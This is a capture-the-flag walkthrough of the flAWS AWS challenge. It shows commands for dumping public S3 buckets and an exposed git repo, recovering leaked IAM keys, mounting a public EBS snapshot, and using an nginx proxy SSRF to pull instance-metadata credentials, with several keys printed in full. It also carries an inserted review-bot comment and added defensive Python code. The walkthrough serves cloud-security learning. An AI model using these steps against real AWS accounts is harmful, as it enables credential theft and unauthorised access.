Solving flAWS

There is a quite interesting “always open” CTF challenge in which one has to exploit AWS-specific security mistakes (flaws) to solve it. Funnily enough, its name is flAWS. There are 6 levels in total, with increasing difficulty. Each level contains several hints for those who get stuck. Below are my steps in trying to solve the flAWS challenge.

Level 1

The text clearly hints at buckets, so it’s about AWS S3 buckets. There are several AWS regions, but the site clearly resides in us-west-2:

$ dig +short
$ dig -x +short

So we can open the URL of the corresponding bucket in that region: the secret can be seen there.

Level 2

I had already configured the aws CLI utility for my AWS account, so it was very simple:

$ aws s3 ls s3://
2017-02-27 04:02:15      80751 everyone.png
2017-03-03 05:47:17       1433 hint1.html
2017-02-27 04:04:39       1035 hint2.html
2017-02-27 04:02:14       2786 index.html
2017-02-27 04:02:14         26 robots.txt
2017-02-27 04:02:15       1051 secret-e4443fc.html

Otherwise, you should register a free AWS account, add an IAM user with S3 access, configure the aws CLI tool, then run the command above.

Level 3

The same approach:

$ aws s3 ls s3://
                           PRE .git/
2017-02-27 02:14:33     123637 authenticated_users.png
2017-02-27 02:14:34       1552 hint1.html
2017-02-27 02:14:34       1426 hint2.html
2017-02-27 02:14:35       1247 hint3.html
2017-02-27 02:14:33       1035 hint4.html
2017-02-27 04:05:16       1703 index.html
2017-02-27 02:14:33         26 robots.txt

Apparently there is a git repository here. Let’s download it by parsing the S3 bucket listing:


BASEURL="${BASEURL:?set BASEURL to the bucket listing URL, with a trailing slash}"

# Every object shows up as a <Key> element in the listing XML; xml_pp puts each
# element on its own line so sed can extract the key names. Note that a single
# listing request returns at most 1000 keys.
for FILE in $(curl -s "$BASEURL" | xml_pp | sed -rn '/<Key>/s/.*<Key>(.+)<\/Key>.*/\1/p') ; do
    mkdir -p "$(dirname "$FILE")"
    curl -s "$BASEURL$FILE" -o "$FILE"
done

Now we have a copy of the git repo. Let’s look into it:

$ git log
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 
Date:   Sun Sep 17 09:10:43 2017 -0600

    Oops, accidentally added something I shouldn't have

commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 
Date:   Sun Sep 17 09:10:07 2017 -0600

    first commit

What’s changed in the last commit?

$ git diff HEAD~1
diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
index e3ae6dd..0000000
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAJ366LIPB4IJKT7SA
-secret_access_key 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
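Review bot: deleting access_keys.txt in this hunk neither revokes nor hides anything; the two `-` lines are the credentials themselves, and the parent commit f52ec03 (shown in the log above) still contains the file, so `git show f52ec03:access_keys.txt` returns both values from any clone. The remediation is to deactivate and rotate the key in IAM; a follow-up deletion commit is not a fix.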

So, someone committed secret credentials into the repo and then “removed” them in a second commit.
We can use these credentials by adding them to ~/.aws/credentials:

[flaws]
aws_access_key_id = AKIAJ366LIPB4IJKT7SA
aws_secret_access_key = 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
region = us-west-2

This IAM user has access to S3, so we can use that:

$ aws s3 ls --profile flaws
2017-02-12 23:31:07
2017-05-29 19:34:53 config-bucket-975426262029
2017-02-12 22:03:24 flaws-logs
2017-02-05 05:40:07
2017-02-24 03:54:13
2017-02-26 20:15:44
2017-02-26 20:16:06
2017-02-26 21:44:51
2017-02-26 21:47:58
2017-02-26 22:06:32

Here we can see the bucket names (domains) of all the following levels, but the actual solutions are located in subdirectories, so there is no profit in that. However, the level4 domain works fine.
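The lesson of Level 3 is that a secret deleted in a later commit is still present in every clone’s history. As an added example (not part of the original write-up or of the challenge), here is a small Python scanner over `git log -p --all` output that maps each AWS access key ID to the commits that added and “removed” it; SAMPLE_LOG, the key ID and the secret inside it are constructed stand-ins for the page’s repo, and the function names are my own.

```python
import re

# AWS access key IDs: long-term keys start with AKIA, temporary ones with ASIA.
AWS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")

# Constructed sample of `git log -p --all` output, shaped like the flAWS repo:
# a credentials file is added in one commit and deleted in the next.
# The key ID and secret below are made up for this example.
SAMPLE_LOG = """\
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
    Oops, accidentally added something I shouldn't have
diff --git a/access_keys.txt b/access_keys.txt
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAEXAMPLEEXAMPLE01
-secret_access_key NOT-A-REAL-SECRET
commit f52ec03b227ea6094b04e43f475fb0126edb5a61
    first commit
diff --git a/access_keys.txt b/access_keys.txt
--- /dev/null
+++ b/access_keys.txt
@@ -0,0 +1,2 @@
+access_key AKIAEXAMPLEEXAMPLE01
+secret_access_key NOT-A-REAL-SECRET
"""


def scan_history(log_text):
    """Map each key ID to the (commit, path) pairs that added or removed it."""
    found, commit, path = {}, None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:7]
        elif line.startswith("diff --git "):
            path = line.split()[-1][2:]          # strip the "b/" prefix
        elif line.startswith(("+++", "---")):
            continue                             # file headers, not content
        elif line[:1] in ("+", "-"):
            for key in AWS_KEY_ID.findall(line):
                entry = found.setdefault(key, {"added_in": [], "removed_in": []})
                side = "added_in" if line[0] == "+" else "removed_in"
                entry[side].append((commit, path))
    return found


def recoverable_keys(log_text):
    """Key IDs any clone can still recover, whether or not a later commit removed them."""
    return sorted(k for k, v in scan_history(log_text).items() if v["added_in"])
```

Feed it real `git log -p --all` output; every key in `recoverable_keys` needs rotating, and the `added_in` commit is the one `git show <commit>:<path>` would reveal.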

Level 4

We need a login and password to get into that page. It is said that there exists a snapshot of the EC2 instance, so we can search for it:

$ aws --profile flaws ec2 describe-snapshots > snapshots.json

This command took ~5 minutes to run. In the snapshots.json file we can see a snapshot named flaws backup 2017.02.27; its SnapshotId is snap-0b49342abd1bdcb89. Let’s try to search for it among the public EBS snapshots of the us-west-2 region:

As I had my free-tier EC2 instance running in another region (us-east-2), I had to copy the snapshot there, create a volume from it, attach the volume to my instance and then mount it:

# mount /dev/sdf1 /mnt

Now we have the password hash here:

# cat /mnt/etc/nginx/.htpasswd

John the Ripper was not able to crack the password in half an hour, so I had to look for other opportunities. In short, the solution was in the home directory of the ubuntu user:

# cat /mnt/home/ubuntu/ 
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Some more interesting points regarding this snapshot:
1. You can bypass the password and skip to the next level just by looking at the contents of /var/www/html/index.html.
2. There are some hints for the next level in the /mnt/home/ubuntu/.bash_history file:


3. The nginx proxy_pass configuration, which will also be useful in the next level:

# $proxyhost is taken verbatim from the request path, so any host reachable
# from the instance, including the metadata service, can be proxied.
location ~* ^/proxy/((?U).+)/(.*)$ {
  limit_except GET {
    deny all;
  }
  limit_req zone=one burst=1;
  set $proxyhost '$1';
  set $proxyuri '$2';

  proxy_limit_rate 4096;
  proxy_set_header X-Real-IP $remote_addr;
  proxy_set_header Host      $proxyhost;

  proxy_pass http://$proxyhost/$proxyuri;
}

Level 5

Test the proxy:

$ curl

Now let’s use the .bash_history hint:

$ curl
  "Code" : "Success",
  "LastUpdated" : "2018-02-17T17:18:20Z",
  "Type" : "AWS-HMAC",
  "SecretAccessKey" : "5CoWWPLfBElhMr2ObBeM9ci1YKyLxpYxn2vq/R6B",
  "Token" : "FQoDYXdzEML//////////wEaDI7Qf4V3tL0C629kLSK3A9UCrbmtuFjiNYswHgrvw1ZK3ZtG5TrnzcfFTjmrW1UMXvMt/fX3niZH9HQNp1P4OUdIhJyMxWMINFgotcBR3aDGREB68XT/tc90HoJkBFDfmItIOBNF/bmxY2s6UycUO4ATJxOUQw+g0apPiQ4WolHFVI4rdubp1KN3eKwFcovLSr72ClLsjUgc0sH8oDuqk+4UZS7rW8u/hyvMK0ZT77kpYJgqf4UHC/SxcDhKXXsqKW2p5WtXYwCtacdJTOHjhRzjFk44+z3oqf6wCWS45abiv6TYR+p7ZT/xzGb6zZpu8KRQA2xs4oSiFV6NfNQKU2/NVyk7dKVdbH29sTtexMwdyxxdiD64QH4L33jVL4ld9wLkHLz7mStGQ4Pl6JoLWIEQEd6B6KjSOcs+qeaR9PXrsrNXuntIBMo7YJahycKaVi9+QxWomI363tgheVmg1aY7qBirDNBVrMTl7it90dNEKpRPzfSqlUQeSVmnSMLTuoMxWSlSwHe9o+w8dUdZgYpa2DAxigh9pvJ/WpRLzfcG/5nqAmGpSrhX8N590QlBcxdwkNQx79AXO+fs/oXcMKkVHKTGwt0ovceh1AU=",
  "Expiration" : "2018-02-17T23:46:43Z"

With this, we’ve got temporary credentials carrying the permissions originally granted to this EC2 instance. We can add these credentials to ~/.aws/credentials as well:

[proxy]
aws_access_key_id = ASIAIGQ3CHKDYV4VWOHA
aws_secret_access_key = hfrgtU6Uj5g7SUey5hwm42NsjypzTMVPjUKj6U/R
aws_session_token = <Token value from the output above>

Let’s use it:

$ aws --profile proxy s3 ls s3://
                           PRE ddcc78ff/
2017-02-27 04:11:07        871 index.html
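Level 5 works because `$proxyhost` comes straight from the request path and goes into proxy_pass, so the instance metadata address is as reachable as any public host. As an added example (not from the challenge or the original write-up), here is the check a forwarding proxy should apply before connecting, written in Python: the target must be on an explicit allowlist and must not resolve into link-local or private address space. `is_blocked`, `resolve_all`, `proxy_target_allowed` and the allowlist are my own names, and the resolver is injectable so the logic can be exercised offline with constructed answers.

```python
import ipaddress
import socket

# Ranges a forwarding proxy must never reach: link-local (which contains the
# EC2 instance metadata service at 169.254.169.254), loopback and the private
# ranges, in IPv4 and IPv6 form.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16", "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "::1/128", "fe80::/10", "fd00::/8", "fec0::/10",
)]


def is_blocked(addr):
    """True if addr (an ipaddress object) lies in a blocked range."""
    mapped = getattr(addr, "ipv4_mapped", None)   # e.g. ::ffff:169.254.169.254
    if mapped is not None:
        addr = mapped
    return any(addr in net for net in BLOCKED_NETWORKS)


def resolve_all(host):
    """All addresses host resolves to; uses the system resolver (needs DNS)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def proxy_target_allowed(host, allowlist, resolve=resolve_all):
    """Decide whether a request may be forwarded to $proxyhost.

    Two independent gates: the host must be on an explicit allowlist, and
    every address it resolves to must fall outside BLOCKED_NETWORKS (all
    addresses, not just the first, so a mixed DNS answer cannot slip the
    metadata address through). To stay safe against DNS rebinding, the
    proxy should connect to the addresses checked here rather than re-resolve.
    """
    host = host.strip().rstrip(".").lower()
    if host not in allowlist:
        return False
    try:
        addrs = [ipaddress.ip_address(host)]       # literal IP, no lookup
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    return bool(addrs) and not any(is_blocked(a) for a in addrs)
```

The second gate matters even with an allowlist: an allowlisted name that later resolves into 169.254.0.0/16 is still refused.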

Level 6

I started by looking at what exactly the SecurityAudit policy is.

Again, let’s add the new credentials to ~/.aws/credentials:

[audit]
aws_access_key_id = AKIAJFQ6E7BY57Q3OBGA
aws_secret_access_key = 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
region = us-west-2

I tried to use CloudTrail, but without luck:

$ aws --profile audit cloudtrail describe-trails
    "trailList": [
            "S3KeyPrefix": "cloudtrail",
            "IncludeGlobalServiceEvents": true,
            "TrailARN": "arn:aws:cloudtrail:us-west-2:975426262029:trail/cloudtrail",
            "HasCustomEventSelectors": false,
            "Name": "cloudtrail",
            "HomeRegion": "us-west-2",
            "S3BucketName": "flaws-logs",
            "LogFileValidationEnabled": true,
            "IsMultiRegionTrail": true

$ aws --profile audit cloudtrail lookup-events
An error occurred (AccessDeniedException) when calling the LookupEvents operation: User: arn:aws:iam::975426262029:user/Level6 is not authorized to perform: cloudtrail:LookupEvents

In the end, I gave up and had to follow all the hints. The last puzzle was quite complicated.

Kudos to Scott Piper for this interesting challenge, from which I learnt some things about Amazon Web Services.
